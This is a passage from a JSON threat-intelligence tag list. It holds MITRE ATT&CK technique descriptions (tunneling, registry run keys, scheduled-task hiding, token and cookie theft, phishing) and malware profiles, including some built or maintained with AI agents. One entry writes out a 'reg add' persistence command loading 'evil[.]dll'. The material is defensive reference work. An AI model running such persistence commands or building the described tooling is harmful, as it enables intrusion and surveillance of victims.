are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)(Citation: Sygnia Abyss Locker 2025) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ", "created_on": "2020-12-21T16:08:34.000Z", "name": "Protocol Tunneling"}, {"id": "d660cca8-5bf7-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", "created_on": "2021-01-21T14:49:17.000Z", "name": "Python"}, {"id": "a2faebc4-c394-48e6-8748-470c721b5a91", "category": "trellix-tool", "description": "The genuine python.exe file is an essential software component developed by the Python Software Foundation that functions as the primary executable used to launch Python applications. As an adaptable, high-level programming language, Python accommodates multiple coding paradigms, including object-oriented, imperative, functional, and procedural programming styles.", "created_on": "2022-08-05T21:14:35.000Z", "name": "python.exe"}, {"id": "9cc8ce6a-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Registry Run Keys / Startup Folder"}, {"id": "901d9f4f-7bb0-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.", "created_on": "2021-03-02T23:39:42.000Z", "name": "Remote Email Collection"}, {"id": "a0ee11c2-5ae8-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).", "created_on": "2020-02-29T11:42:56.000Z", "name": "Replication Through Removable Media"}, {"id": "ae906eaa-ad7a-11ea-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-06-13T13:35:01.000Z", "name": "Research - Innovation"}, {"id": "df1c88c4-9cae-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-23T04:35:46.000Z", "name": "Retail"}, {"id": "c0bb5349-2998-478b-9d81-6d7ff5fe3a67", "category": "country", "description": "Saudi Arabia", "created_on": "2022-04-01T21:14:40.000Z", "name": "saudi arabia"}, {"id": "bea4602e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Scheduled Task"}, {"id": "0e8232db-5ba8-464b-b9fb-adbd15854c12", "category": "trellix-tool", "description": "The command-line tool Schtasks.exe allows administrators to manage scheduled tasks on both local and remote Windows systems, providing the ability to create, delete, query, modify, execute, and terminate them. It is primarily used to automate the running of programs or scripts at designated dates and times. Additionally, executing the command without any specific arguments or parameters will simply output the current status and the next scheduled execution time for all registered tasks on the machine.", "created_on": "2021-08-23T21:00:40.000Z", "name": "Schtasks.exe"}, {"id": "c3ec91d2-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", "created_on": "2020-02-26T13:49:10.000Z", "name": "Screen Capture"}, {"id": "1026f5a1-916e-41f7-9de3-6306fec847e3", "category": "trellix-tool", "description": "SECOMS64 is a modular Windows implant that an Iranian-nexus actor built with AI assistance for surveillance of individuals. Its components included a keylogger that captured keystrokes while the Telegram Desktop application was in focus, a screenshot module that ran as an executable disguised as Telegram, Chrome credential extraction with an App-Bound Encryption bypass, reconnaissance of Microsoft Defender and Intune, a PowerShell reverse shell tunneled through ngrok, USB-drive propagation, and a browser-data destruction module, with persistence layered through registry run keys, high-privilege scheduled tasks, and a binary disguised as a Windows font-driver service, and exfiltration routed through a Telegram bot and commercial cloud storage.", "created_on": "2026-09-12T00:12:32.000Z", "name": "SECOMS64"}, {"id": "e90fcf19-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents  may collect  metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.", "created_on": "2020-11-20T22:08:25.000Z", "name": "Security Software Discovery"}, {"id": "e6f03672-a505-4c4d-ab89-e250978466ad", "category": "trellix-tool", "description": "Shadow C2 is a Windows malware family attributed to GTG-20006 and used for command-and-control within the actor's espionage operations. It was part of the same self-healing toolkit that the operator monitored with AI agents, which would autonomously modify and redeploy any component that security products began to detect, allowing the actor to close the loop between detection and re-tooling faster than defenders could respond. It supported intrusions against military-intelligence, diplomatic, and defense-industrial targets concentrated in Ukraine and Europe.", "created_on": "2026-09-12T00:12:32.000Z", "name": "Shadow C2"}, {"id": "1b9c65c9-c315-4a54-ac9d-32ac0f6348f4", "category": "trellix-threat-actor", "description": "ShinyHunters is a threat actor active since at least 2020, known for advertising and sharing compromised databases from companies across various sectors. These companies are based in countries like the U.S., Brazil, Indonesia, India, and South Korea, and span industries including media, professional services, eCommerce, technology, financial services, and travel. The group is behind the ShinyHunters ransomware.", "created_on": "2025-08-13T16:15:25.000Z", "name": "ShinyHunters"}, {"id": "305a53ed-0a9c-11eb-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-10-10T01:59:10.000Z", "name": "Shipping"}, {"id": "56b0e825-e864-4bb2-9359-fbee56c78d63", "category": "trellix-tool", "description": "Soraki is a criminal carding platform operated by a French-speaking ShinyHunters affiliate tracked within GTG-50014, built on a PostgreSQL and GraphQL stack. It backed an autoshop storefront selling stolen payment-card records enriched with BIN lookups, full cardholder personal data, and an interactive geolocation map of victim addresses, and it aggregated multiple French breach datasets into a searchable service. The shop was delivered to customers through a Telegram Mini App backed by the platform, tying the actor's credential-harvesting pipeline directly to a monetization storefront.", "created_on": "2026-09-12T00:12:32.000Z", "name": "Soraki"}, {"id": "bed41cbd-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an \u201c@\u201d symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also utilize links to perform consent phishing/spearphishing campaigns to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured into granting adversaries permissions/access via a malicious OAuth 2.0 request URL that when accepted by the user provide permissions/access for malicious applications.(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nSimilarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as \u201cdevice code phishing,\u201d an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Spearphishing Link"}, {"id": "1b6f8efc-7896-49ee-9d73-575ed2610388", "category": "trellix-tool", "description": "Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages. Squid has extensive access controls and makes a great server accelerator. It runs on most available operating systems, including Windows and is licensed under the GNU GPL.\r\nSource: http://www.squid-cache.org/", "created_on": "2022-07-26T21:14:07.000Z", "name": "Squid"}, {"id": "c9059ece-b232-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)  Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nFor example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container\u2019s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  \n\nSimilarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges. \n\nIn Azure, an adversary who compromises a resource with an attached Managed Identity, such as an Azure VM, can request short-lived tokens through the Azure Instance Metadata Service (IMDS). These tokens can then facilitate unauthorized actions or further access to other Azure services, bypassing typical credential-based authentication.(Citation: Entra Managed Identities 2025)(Citation: SpecterOps Managed Identity 2022)\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  ", "created_on": "2020-06-19T13:42:57.000Z", "name": "Steal Application Access Token"}, {"id": "000cf478-cbbf-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.", "created_on": "2020-07-22T01:59:38.000Z", "name": "Steal Web Session Cookie"}, {"id": "7945ecf2-f41d-4b7f-919f-cf43e6a5fc58", "category": "sector", "description": "", "created_on": "2024-09-10T21:14:58.000Z", "name": "Streaming service"}, {"id": "83e3caaf-211a-41be-be0b-a38a9a842b21", "category": "country", "description": "Sudan", "created_on": "2022-08-02T21:16:41.000Z", "name": "sudan"}, {"id": "072202e4-d83d-4ad6-8b3c-e3fef9e77a8f", "category": "trellix-tool", "description": "Supabase is an open-source platform that serves as an alternative to Firebase, providing a suite of backend services for developers. At its core, Supabase offers a full Postgres database, which is a highly reliable and extensible relational database. This allows developers to work with structured data, perform complex SQL queries, and benefit from Postgres's robust features like Row Level Security for fine-grained access control.", "created_on": "2025-06-06T00:14:41.000Z", "name": "Supabase"}, {"id": "da2670ed-427f-4468-8986-5867ce2dbdf8", "category": "country", "description": "Syria", "created_on": "2022-08-02T21:16:41.000Z", "name": "syria"}, {"id": "45418178-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:56.000Z", "name": "Telecoms"}, {"id": "2379f629-f98b-47a5-9bc5-46c094a14b87", "category": "trellix-tool", "description": "Telegram is a global instant messaging service that is utilized by threat actors and other users for various malicious and benign purposes. Among the many features telegram provides to its no malicious clients, the API and BOT functionalities can and is abused by threat actors as means to deploy malware and/or exfiltrate data. Due to the service's high usage it is often unblocked and not monitored, providing to an attacker an easy way to bypass network restrictions.", "created_on": "2022-09-06T21:17:06.000Z", "name": "Telegram"}, {"id": "ce8a5594-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:26:17.000Z", "name": "Think Tanks"}, {"id": "f6babf40-eeff-4f35-8fbb-fc86278de4c6", "category": "mitre-attack-pattern", "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). \n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. Tools may also be leveraged for testing \u2013 for example, evaluating malware against commercial antivirus or endpoint detection and response (EDR) applications.(Citation: Forescout Conti Leaks 2022)(Citation: Sentinel Labs Top Tier Target 2025)\n\nTool acquisition may involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). Threat actors may also crack trial versions of software.(Citation: Recorded Future Beacon 2019)", "created_on": "2021-10-01T13:08:42.000Z", "name": "Tool"}, {"id": "9669620d-b31f-11eb-9d72-02d538d9640e", "category": "trellix-tool", "description": "Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination.\r\n\r\nSource: MITRE", "created_on": "2021-05-12T12:43:01.000Z", "name": "TOR-The Onion Router"}, {"id": "7ce564c7-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:34.000Z", "name": "Transport"}, {"id": "12128a36-f53d-4c7a-bd16-df491a6b890d", "category": "trellix-tool", "description": "TruffleHog is a tool used to find leaked credentials.", "created_on": "2024-02-29T06:12:59.000Z", "name": "TruffleHog"}, {"id": "c36b1947-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Trusted Relationship"}, {"id": "73ea1ad1-ec5d-41b4-990e-cb75fb4b8a82", "category": "country", "description": "Ukraine", "created_on": "2022-01-17T08:30:47.000Z", "name": "ukraine"}, {"id": "b83c4260-85b7-11eb-9477-02d538d9640e", "category": "country", "description": "United States of America", "created_on": "2021-03-15T17:56:08.000Z", "name": "united states of america"}, {"id": "25adce58-659f-4691-9296-1366990ac49a", "category": "trellix-tool", "description": "V2Ray is an open-source networking toolkit and platform built to establish secure, custom proxy connections capable of circumventing deep packet inspection and network censorship. Operating as the underlying core of Project V, it routes internet traffic through versatile, highly configurable protocols that obfuscate data flows to resemble standard network traffic. By enabling multi-hop routing, customized traffic encryption, and sophisticated domain-matching rules, it allows users to bypass strict regional firewalls and maintain online privacy. Through its adaptable architectural design, the system provides a robust solution for securing communications and restoring open access to digital information across restricted networks.", "created_on": "2026-09-12T00:12:33.000Z", "name": "V2Ray"}, {"id": "0ac770c3-504e-46fa-9b79-2b29275caf70", "category": "trellix-tool", "description": "VBScript (\"Microsoft Visual Basic Scripting Edition\") is an Active Scripting language developed by Microsoft that is modeled on Visual Basic. It allows Microsoft Windows system administrators to generate powerful tools for managing computers without error handling and with subroutines and other advanced programming constructs. It can give the user complete control over many aspects of their computing environment.\r\n\r\nSource: https://en.wikipedia.org/wiki/VBScript", "created_on": "2023-05-15T21:15:40.000Z", "name": "VBScript"}, {"id": "59f051f8-6f7e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", "created_on": "2020-03-26T16:25:05.000Z", "name": "Video Capture"}, {"id": "bedd7c9c-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )", "created_on": "2020-12-03T03:00:48.000Z", "name": "Visual Basic"}, {"id": "1ffb11c1-9bfc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", "created_on": "2021-04-13T02:01:13.000Z", "name": "Vulnerability Scanning"}, {"id": "3337cfef-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into 